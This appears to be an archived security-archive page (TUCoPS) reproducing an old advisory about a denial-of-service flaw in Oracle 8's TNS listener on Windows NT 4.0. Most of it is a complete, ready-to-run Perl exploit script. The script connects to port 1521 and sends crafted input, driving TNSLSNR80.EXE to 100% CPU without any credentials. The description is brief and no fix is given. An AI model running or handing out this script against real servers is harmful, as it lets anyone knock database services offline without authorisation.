TUCoPS :: Windows Apps :: oracle.htm


TUCoPS :: Windows Apps :: oracle.htm

Oracle 8 for NT crash exploit 
Vulnerability
 Oracle
Affected
 Oracle 8
Description
 'r0ot' found following. Attached is a little perl-script, which
 makes TNSLSNR80.EXE consume all available cpu-time so the computer
 becomes unusable. It works on Oracle 8 servers running Windows
 NT 4.0 (SP6) and does not require any authentication credentials
 to succeed. This has not been tried on any other versions or
 platforms.
 #!/usr/local/bin/perl -w
 
 # This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
 # TNSLSNR80.EXE will consume 100% CPU...
 #
 # by r0ot@runbox.com
 
 use IO::Socket;
 
 $host="kickme";
 # enter the hostname of the oracle-server to kick
 
 socket(HANDLE, PF_INET, SOCK_STREAM, 6);
 connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
 HANDLE->autoflush(1);
 
 sleep(2);
 print HANDLE "\n";
 for ($i=0; $i<3; $i++) {
 sleep(2);
 print HANDLE "dfsdffdfsfdggfdgdf";
 # an arbitrary, but carefully chosen constant...
 }
 
 close(HANDLE);
Solution
 Nothing yet.

AltStyle によって変換されたページ (->オリジナル) /

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH